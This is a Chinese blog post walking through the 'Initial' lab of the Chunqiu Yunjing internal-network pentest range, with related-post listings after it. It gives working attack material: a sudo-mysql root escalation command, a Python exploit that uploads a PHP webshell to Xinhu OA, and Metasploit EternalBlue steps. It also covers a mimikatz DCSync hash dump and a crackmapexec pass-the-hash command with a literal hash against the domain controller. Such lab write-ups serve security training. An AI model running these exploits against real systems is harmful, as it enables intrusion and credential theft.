【内网渗透】最保姆级的春秋云镜initial打靶笔记

于 2024-08-20 18:55:52 发布
阅读量269 收藏 4
点赞数 8
文章标签: 春秋云镜 内网渗透 域渗透 wp initial
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/uuzeray/article/details/141316323
版权

目录

flag1

flag2

flag3 

flag1

外网thinkphp服务 

随便找个工具梭

连蚁剑

读/root目录要提权

suid没有可利用的提权命令,打sudo提权

sudo -l

mysql的sudo提权 

Linux提权之Sudo 70种提权方法 - 简单安全

 查看文件名带flag的文件

sudo mysql -e '\! find / -type f -name '*flag*' 2>/dev/null'

读文件

sudo mysql -e '\! cat /root/flag/flag01.txt'

拿到第一个flag,提示下一个flag在内网服务器 

flag{60b53231-

flag2

 msf反弹shell

上传fscan扫内网

 https://github.com/shadow1ng/fscan/releases

172.22.1.2   DC域控
172.22.1.21  MS17-010永恒之蓝
172.22.1.18  信呼OA系统

先打信呼0A

frp内网穿透

vps上先起一个frps

./frps -c frps.ini

再在靶机上起一个frpc

先上传或者wget下载frpc和frpc.ini

./frpc -c frpc.ini

本机电脑配一下Proxifier

然后就能直接浏览器里访问内网服务

现成exp梭了 

import requests


session = requests.session()

url_pre = 'http://url/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'

data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'dGVzdA::',
    'adminpass': 'YWJjMTIz',
    'yanzm': ''
}


r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})

filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']

url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'

r = session.get(url3)

先给蚁剑配置socks5代理

蚁剑连http://172.22.1.18/upload/2024-08/20_17073585.php拿到flag2

flag02: 2ce3-4813-87d4-

最后提示我们去打DC

flag3 

在打DC前先打172.22.1.21 MS17-010永恒之蓝

这个一般直接拿kali的msf打就行

先给msf所在机配一下socks5代理

vim /etc/proxychains4.conf

proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit

成功正向连接

永恒之蓝打了之后本身就是SYSTEM权限,可以mimikatz搜集域内用户hash

load kiwi
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv

 

再用crackmapexec打PTH拿下域控

proxychains crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

 拿到flag3

flag03: e8f88d0d43d6}

Z3r4y
关注
  • 8
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
春秋云境—Initial
龙狼刺的博客
07-15 1887
Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。在DCSync技术没有出现之前,攻击者要想拿到内用户的hash,就只能在控制器上运行 Mimikatz 或 Invoke-Mimikatz去抓取密码hash,但是在2015 年 8 月份, Mimkatz新增了一个主要功能叫"DCSync",使用这项技术可以有效地 “模拟” 控制器并从目标控上请求内用户密码hash。
内网安全之:内网渗透流程
f_carey的博客
09-12 1万+
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 内网渗透流程1 前提2 实验环境2.1 建立 meterpreter 反向连接2.2 收集信息提升权限2.3 持久后门: 添加隐藏用户2.4 添加内网路由2.5 扫描内网存活主机2.6 扫描内网主机开放的端口2.6.1 使用 SOCKS 后nmap 扫描报错2.7 攻击内网主机 1 前提 利用已经控制的一台计.
春秋云镜靶场Initial-WriteUP 专业徽章手把手教学
qq_45234543的博客
11-17 3857
春秋云镜靶场Initial-WP,专业徽章,完整flag获取教程
内网渗透春秋云镜Intitle WP
Sapphire037的博客
04-23 2206
第一次正式接触内网渗透的东西,写的很新手,也适合新手观看,有问题可以私信或评论,接下来会持续更新。
手把手教你如何进行内网渗透
热门推荐
iO快到碗里来
11-19 8万+
0x00 Preface 内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。 内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。 0x01 信息收集 systeminfo 查看系统详细信息,如OS版本、补丁安装情况,可以根据这些信息筛选可利用的漏洞。 net start 查看启动进
保姆】阿里云服务器frp内网穿透教程
第四维度的博客
04-28 1万+
背景1: 去年买了一台阿里云服务器,轻量应用服务器,2核4G.个人比较喜欢嵌入式,开发板也不少,但是开发板连接路由器后内次都要看一下IP然后去连接(虽然可以在路由器上控设置固定IP),然后最近突发奇想,使用阿里云服务器的公网IP作为跳板实现frp内网穿透,实现公网IP+端口随时随地就能控制你的开发板[nice.jpg],也能通过公网IP+端口访问你的电脑等等,感觉特别好玩,联想起huashengke的实现原理好像也是这样。 背景2: 就在前不久,感觉学校的内网把我的公网IP给拦截了,只要是使用学校的内网都p
内网渗透系列:内网渗透思路整理
闵行小鱼塘
07-02 8627
整理下内网渗透的思路
春秋云镜-Tsclient-Writeup
qq_35607078的博客
07-12 1万+
春秋云镜-Tsclient-Writeup
内网渗透之命令辅助
Fly_鹏程万里
11-28 2958
文章前言 本篇文章主要介绍一些内网渗透中常用的命令~ 常用命令 项目地址: GitHub - Al1ex/Pentest-Command: Pentest-Command 相关扩展 Wiindows渗透命令: WADComs Linux 命令: GTFOBins
《内网安全攻防:渗透测试实战指南》读书笔记(八):权限维持分析及防御
闵行小鱼塘
04-22 4878
本篇继续阅读学习《内网安全攻防:渗透测试实战指南》,本章是权限维持分析及防御,分析了常见的针对操作系统后门、Web后门及后门(白银票据、黄金票据等)的攻击手段,并给出了相应的检测和防范方法
内网渗透笔记,课堂资料
03-11
这篇“内网渗透笔记,课堂资料”提供了一套系统性的学习资源,帮助读者了解和掌握内网渗透的相关知识。 一、内网渗透基础 内网渗透涉及到多个步骤,首先需要进行信息收集。这包括但不限于DNS查询、SNMP扫描、端口...
神卓互联企业内网穿透,9.0.4最新版
05-19
最好用的企业内网穿透软件,神卓互联是一款专为内网穿透而设计的软件,可以将内网服务器映射到公网上,使用户可以从外网访问内网资源。 神卓互联支持多种服务映射,包括HTTP、HTTPS、TCP和UDP等,且配置简单易用...
内网渗透技术总结大全.pdf
12-22
内网渗透技术总结大全.pdf
内网渗透渗透.pdf
08-07
内网渗透渗透要求攻击者具备深入理解目标网络架构的能力,以及熟练掌握操作系统的各种命令和利用安全漏洞的方法。在实际操作中,攻击者通常会使用一系列标准化的步骤和技术手段来达成渗透目的,例如扫描网络资源...
内网渗透思路整理与工具使用
12-08
内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用
自动化纹理魔法:Maya脚本在纹理贴图中的应用
最新发布
08-19
Maya脚本主要有两种形式:MEL(Maya Embedded Language)和Python。MEL是Maya的内置脚本语言,用于自动化任务、扩展Maya的功能以及自定义用户界面。MEL脚本可以快速创建对象、精确控制对象属性,以及执行复杂的场景管理任务。MEL的语法结构与C语言接近,支持强制语法和函数语法,是一种强类型语言,但通常允许隐式声明和类型转换。 Python脚本在Maya中的应用也非常广泛,特别是在Maya 2020及以后的版本中。Python提供了一种更为现代和灵活的方式来编写脚本,可以利用Python的强大库进行复杂的数据处理和自动化任务。Python脚本可以通过`maya.cmds`模块访问Maya的命令,实现与MEL相似的功能。 在Maya中,脚本可以通过“脚本编辑器”(Script Editor)进行编写和执行,也可以保存为`.mel`或`.py`文件以便重复使用。脚本编辑器提供了MEL和Python两种语言选项,允许用户在不同语言环境下编写和测试脚本。此外,Maya还支持将Python函数注册为MEL程序,以便在需要MEL脚本的地方使用Python代码。
反弹shell的几种获取方式.docx
08-19
一、反弹shell 二、python pty 方式 三、suid提权的方式 1、 suid权限的设置 2、 找出系统中具有suid权限的命令 3、 find提权 四、sessions的使用方法
IMG_20240819_173351.jpg
08-19
IMG_20240819_173351.jpg
Wireshark安装包(内有支持win7,win10,win11)总有一个版本适合
08-19
Wireshark是一款强大的网络协议分析器,主要用于捕获和深入分析网络流量,是网络故障排查、安全审计以及网络协议学习的重要工具。64位版本的Wireshark适用于运行64位操作系统的计算机,如Windows 7和8。在这个安装包中,主要包含两个文件:Wireshark-win64-2.2.1.exe是Wireshark的64位安装程序,下载帮助.txt则可能提供有关如何下载和安装软件的指导。 1. **Wireshark的基本功能**: - **数据包捕获**:Wireshark能够实时捕获来自网络接口的数据包,包括各种协议如TCP/IP、HTTP、FTP等。 - **协议解析**:它能解析并显示数据包的详细结构,帮助用户理解网络通信过程。 - **过滤与搜索**:提供强大的过滤器语言,可以快速定位特定类型的网络流量。同时,可以搜索数据包内容,便于分析。 - **颜色编码**:根据数据包的不同特性,如异常或潜在问题,使用不同颜色高亮显示。 - **解码与重构**:能够解码多种协议,并在重组TCP流时呈现会话的完整视图。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值